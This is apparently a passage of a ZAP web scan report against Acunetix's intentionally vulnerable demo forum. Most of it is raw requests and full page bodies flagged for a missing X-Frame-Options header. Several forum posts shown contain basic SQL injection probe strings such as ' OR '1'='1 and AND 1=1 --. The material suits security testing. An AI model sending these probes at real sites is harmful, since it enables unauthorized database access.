href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL 